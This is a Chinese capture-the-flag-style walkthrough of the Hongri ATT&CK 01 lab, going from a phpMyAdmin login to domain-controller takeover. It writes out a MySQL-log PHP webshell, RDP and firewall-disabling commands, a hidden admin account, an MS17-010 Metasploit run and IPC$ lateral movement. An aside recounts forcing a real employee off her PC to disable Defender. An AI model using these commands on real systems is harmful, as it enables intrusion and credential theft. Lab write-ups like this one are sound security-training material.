最全面的解析-红日靶场ATT&CK系列01WP-域控

环境配置

图片[1],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

目标就是拿下域控(域管)

图片[2],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

整个流程图

图片[3],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

需要注意的是:192.168.52.143也在域内 可以IPC或者PTH横向打过去

渗透

使用无影对

192.168.111.128进行扫描

图片[4],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

访问80端口是个Phpstudy探针

图片[5],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

搜索phpstudy的历史漏洞,尝试后没打进去

扫目录后发现phpmyadmin

图片[6],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

root/root成功登录

尝试写入shell

发现写不进shell

查看日志

show variables like '%general%';
图片[7],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

开启日志

set global general_log=on;
图片[8],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

设置日志路径set global general_log_file=’C:/phpStudy/WWW/info.php’

图片[9],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

写入木马

图片[10],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网
SELECT <?php @eval($_GET['123']); ?>

成功执行

图片[11],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

上线到哥斯拉

图片[12],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

执行whoami命令证明shell成功

图片[13],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

查看一下端口开没开3389

图片[14],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

注册表打开3389权限

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭防火墙,开放3389端口

netsh firewall set opmode disable
netsh advfirewall firewall Add rule name="RDP" dir=in protocol=tcp localport=3389 action=allow

添加远程桌面账号密码

net user Test123$ 1qaz@WSX /add && net localgroup administrators Test123$ /add

有人在,在真实攻防的时候要趁没人的时候给他挤下来

(之前攻防现场3389控了个某公司财务电脑,有windows defener上不了Vshell我们趁着中午的时候给她挤下来关掉了defener成功上线了,并做了维权处理)

图片[15],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网
图片[16],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

可以直接mimikatz dump哈希或者上CS

dump哈希密码hongrisec@2019

上个CS里面插件比较多

有域控在CS上打比较方便

设置一下回连

图片[17],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

哈希

图片[18],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

双网卡

图片[19],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

换个好用的CS

能梭哈就不手动 这个插件多一点

尝试提权到system

图片[20],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网
图片[21],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网
图片[22],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

扫描到两台MF-010

图片[23],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网
图片[24],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

打2003那台

由于我们是双网卡 想用MF010打192.168.52段

所以此时此刻必须搞个隧道代理出来

图片[25],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网
图片[26],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

查看自己的IP这里的IP是CS的服务端!

图片[27],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

如果你们使用kali proxychains4出错的话可以看我这个文章

图片[28],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网
图片[29],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

交互式shell上传失败了 上一个非交互shell

这里 comman需要自己设置

命令如下

msfconsole
use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.141
setg Proxies socks5:192.168.111.130:1005
exploit

拿下域内用户

图片[30],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

尝试IPC传递

图片[31],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网
beacon> shell net use \\192.168.52.138\ipc$ "hongrisec@2020" /user:"administrator"

net use查看是否生效

图片[32],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

执行命令

图片[33],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网

成功拿下域控,后续想干什么干什么了

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容